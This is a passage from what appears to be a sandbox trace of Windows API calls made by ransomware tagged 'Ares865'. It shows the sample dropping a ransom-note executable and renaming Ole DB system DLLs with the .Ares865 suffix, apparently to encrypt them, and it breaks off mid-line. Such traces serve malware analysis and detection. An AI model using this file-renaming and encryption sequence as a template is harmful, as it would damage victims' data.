(lpFileName="C:\\Program Files (x86)\\Common Files\\System\\wab32res.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\wab32res.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.157] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1098752) returned 1 [0145.213] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\System\\Ole DB", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB") returned="C:\\Program Files (x86)\\Common Files\\System\\Ole DB" [0145.213] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\Ole DB" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB") returned="C:\\Program Files (x86)\\Common Files\\System\\Ole DB" [0145.213] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0145.213] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\how to back your files.exe"), bFailIfExists=1) returned 0 [0145.215] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0145.215] GetLastError () returned 0x0 [0145.216] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0145.216] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5344d3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5344d3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0145.216] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0145.216] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0145.216] lstrcpyW (in: lpString1=0x2cce464, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0145.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0145.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4788 [0145.216] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0145.216] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5344d3e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5344d3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0145.216] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0145.216] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad7e30c4, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xad7e30c4, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9bb42720, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msdadc.dll", cAlternateFileName="")) returned 1 [0145.216] lstrcmpiW (lpString1="msdadc.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0145.216] lstrcmpiW (lpString1="msdadc.dll", lpString2="aoldtz.exe") returned 1 [0145.217] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdadc.dll" | out: lpString1="msdadc.dll") returned="msdadc.dll" [0145.217] lstrlenW (lpString="msdadc.dll") returned 10 [0145.217] lstrlenW (lpString="Ares865") returned 7 [0145.217] lstrcmpiW (lpString1="adc.dll", lpString2="Ares865") returned -1 [0145.217] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll.Ares865") returned 68 [0145.217] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdadc.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdadc.dll.ares865"), dwFlags=0x1) returned 1 [0145.220] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdadc.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdadc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.220] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0145.223] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdaenum.dll" | out: lpString1="msdaenum.dll") returned="msdaenum.dll" [0145.223] lstrlenW (lpString="msdaenum.dll") returned 12 [0145.223] lstrlenW (lpString="Ares865") returned 7 [0145.223] lstrcmpiW (lpString1="num.dll", lpString2="Ares865") returned 1 [0145.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll.Ares865") returned 70 [0145.223] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaenum.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaenum.dll.ares865"), dwFlags=0x1) returned 1 [0145.225] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaenum.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaenum.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.225] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0145.228] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdaer.dll" | out: lpString1="msdaer.dll") returned="msdaer.dll" [0145.228] lstrlenW (lpString="msdaer.dll") returned 10 [0145.228] lstrlenW (lpString="Ares865") returned 7 [0145.228] lstrcmpiW (lpString1="aer.dll", lpString2="Ares865") returned -1 [0145.228] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll.Ares865") returned 68 [0145.228] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaer.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaer.dll.ares865"), dwFlags=0x1) returned 1 [0145.230] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaer.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaer.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.230] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0145.233] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdaora.dll" | out: lpString1="msdaora.dll") returned="msdaora.dll" [0145.233] lstrlenW (lpString="msdaora.dll") returned 11 [0145.233] lstrlenW (lpString="Ares865") returned 7 [0145.233] lstrcmpiW (lpString1="ora.dll", lpString2="Ares865") returned 1 [0145.234] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll.Ares865") returned 69 [0145.234] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaora.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaora.dll.ares865"), dwFlags=0x1) returned 1 [0145.235] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaora.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaora.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.235] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=286720) returned 1 [0145.253] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdaorar.dll" | out: lpString1="msdaorar.dll") returned="msdaorar.dll" [0145.253] lstrlenW (lpString="msdaorar.dll") returned 12 [0145.253] lstrlenW (lpString="Ares865") returned 7 [0145.253] lstrcmpiW (lpString1="rar.dll", lpString2="Ares865") returned 1 [0145.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll.Ares865") returned 70 [0145.253] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaorar.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaorar.dll.ares865"), dwFlags=0x1) returned 1 [0145.256] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaorar.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaorar.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.256] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0145.259] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdaosp.dll" | out: lpString1="msdaosp.dll") returned="msdaosp.dll" [0145.259] lstrlenW (lpString="msdaosp.dll") returned 11 [0145.259] lstrlenW (lpString="Ares865") returned 7 [0145.259] lstrcmpiW (lpString1="osp.dll", lpString2="Ares865") returned 1 [0145.259] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll.Ares865") returned 69 [0145.259] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaosp.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaosp.dll.ares865"), dwFlags=0x1) returned 1 [0145.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaosp.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaosp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.261] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94208) returned 1 [0145.269] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdaps.dll" | out: lpString1="msdaps.dll") returned="msdaps.dll" [0145.269] lstrlenW (lpString="msdaps.dll") returned 10 [0145.269] lstrlenW (lpString="Ares865") returned 7 [0145.269] lstrcmpiW (lpString1="aps.dll", lpString2="Ares865") returned -1 [0145.270] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll.Ares865") returned 68 [0145.270] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaps.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaps.dll.ares865"), dwFlags=0x1) returned 1 [0145.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaps.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaps.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.271] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=249856) returned 1 [0145.286] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdasc.dll" | out: lpString1="msdasc.dll") returned="msdasc.dll" [0145.286] lstrlenW (lpString="msdasc.dll") returned 10 [0145.286] lstrlenW (lpString="Ares865") returned 7 [0145.286] lstrcmpiW (lpString1="asc.dll", lpString2="Ares865") returned 1 [0145.286] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll.Ares865") returned 68 [0145.286] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasc.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasc.dll.ares865"), dwFlags=0x1) returned 1 [0145.288] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasc.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.288] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0145.419] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdasql.dll" | out: lpString1="msdasql.dll") returned="msdasql.dll" [0145.419] lstrlenW (lpString="msdasql.dll") returned 11 [0145.419] lstrlenW (lpString="Ares865") returned 7 [0145.419] lstrcmpiW (lpString1="sql.dll", lpString2="Ares865") returned 1 [0145.420] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll.Ares865") returned 69 [0145.420] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasql.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasql.dll.ares865"), dwFlags=0x1) returned 1 [0145.424] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasql.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasql.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.424] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=610304) returned 1 [0145.462] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdasqlr.dll" | out: lpString1="msdasqlr.dll") returned="msdasqlr.dll" [0145.462] lstrlenW (lpString="msdasqlr.dll") returned 12 [0145.462] lstrlenW (lpString="Ares865") returned 7 [0145.462] lstrcmpiW (lpString1="qlr.dll", lpString2="Ares865") returned 1 [0145.462] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll.Ares865") returned 70 [0145.462] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasqlr.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasqlr.dll.ares865"), dwFlags=0x1) returned 1 [0145.464] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdasqlr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdasqlr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=61440) returned 1 [0145.480] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdatl3.dll" | out: lpString1="msdatl3.dll") returned="msdatl3.dll" [0145.480] lstrlenW (lpString="msdatl3.dll") returned 11 [0145.480] lstrlenW (lpString="Ares865") returned 7 [0145.480] lstrcmpiW (lpString1="tl3.dll", lpString2="Ares865") returned 1 [0145.480] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll.Ares865") returned 69 [0145.480] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatl3.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatl3.dll.ares865"), dwFlags=0x1) returned 1 [0145.482] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatl3.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatl3.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.482] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98304) returned 1 [0145.540] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdatt.dll" | out: lpString1="msdatt.dll") returned="msdatt.dll" [0145.540] lstrlenW (lpString="msdatt.dll") returned 10 [0145.540] lstrlenW (lpString="Ares865") returned 7 [0145.540] lstrcmpiW (lpString1="att.dll", lpString2="Ares865") returned 1 [0145.540] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll.Ares865") returned 68 [0145.540] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatt.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatt.dll.ares865"), dwFlags=0x1) returned 1 [0145.543] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdatt.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdatt.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.543] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20480) returned 1 [0145.596] lstrcpyW (in: lpString1=0x2cce464, lpString2="msdaurl.dll" | out: lpString1="msdaurl.dll") returned="msdaurl.dll" [0145.596] lstrlenW (lpString="msdaurl.dll") returned 11 [0145.596] lstrlenW (lpString="Ares865") returned 7 [0145.596] lstrcmpiW (lpString1="url.dll", lpString2="Ares865") returned 1 [0145.596] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll.Ares865") returned 69 [0145.596] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaurl.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaurl.dll.ares865"), dwFlags=0x1) returned 1 [0145.603] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msdaurl.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msdaurl.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.603] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7168) returned 1 [0145.627] lstrcpyW (in: lpString1=0x2cce464, lpString2="msxactps.dll" | out: lpString1="msxactps.dll") returned="msxactps.dll" [0145.627] lstrlenW (lpString="msxactps.dll") returned 12 [0145.627] lstrlenW (lpString="Ares865") returned 7 [0145.627] lstrcmpiW (lpString1="tps.dll", lpString2="Ares865") returned 1 [0145.628] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll.Ares865") returned 70 [0145.628] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msxactps.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msxactps.dll.ares865"), dwFlags=0x1) returned 1 [0145.631] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\msxactps.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\msxactps.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.631] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0145.641] lstrcpyW (in: lpString1=0x2cce464, lpString2="oledb32.dll" | out: lpString1="oledb32.dll") returned="oledb32.dll" [0145.641] lstrlenW (lpString="oledb32.dll") returned 11 [0145.641] lstrlenW (lpString="Ares865") returned 7 [0145.641] lstrcmpiW (lpString1="b32.dll", lpString2="Ares865") returned 1 [0145.642] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll.Ares865") returned 69 [0145.642] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32.dll.ares865"), dwFlags=0x1) returned 1 [0145.644] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.644] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=864256) returned 1 [0145.762] lstrcpyW (in: lpString1=0x2cce464, lpString2="oledb32r.dll" | out: lpString1="oledb32r.dll") returned="oledb32r.dll" [0145.763] lstrlenW (lpString="oledb32r.dll") returned 12 [0145.763] lstrlenW (lpString="Ares865") returned 7 [0145.763] lstrcmpiW (lpString1="32r.dll", lpString2="Ares865") returned -1 [0145.763] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll.Ares865") returned 70 [0145.763] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32r.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32r.dll.ares865"), dwFlags=0x1) returned 1 [0145.766] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledb32r.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledb32r.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0145.766] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81920) returned 1 [0145.775] lstrcpyW (in: lpString1=0x2cce464, lpString2="oledbjvs.inc" | out: lpString1="oledbjvs.inc") returned="oledbjvs.inc" [0145.775] lstrlenW (lpString="oledbjvs.inc") returned 12 [0145.775] lstrlenW (lpString="Ares865") returned 7 [0145.775] lstrcmpiW (lpString1="jvs.inc", lpString2="Ares865") returned 1 [0145.775] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc.Ares865") returned 70 [0145.775] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbjvs.inc"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\oledbjvs.inc.ares865"), dwFlags=0x1) returned 1 [0145.778] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\oledbjvs.inc.Ares865" (normalized: "c:\\program files (x86)\\common 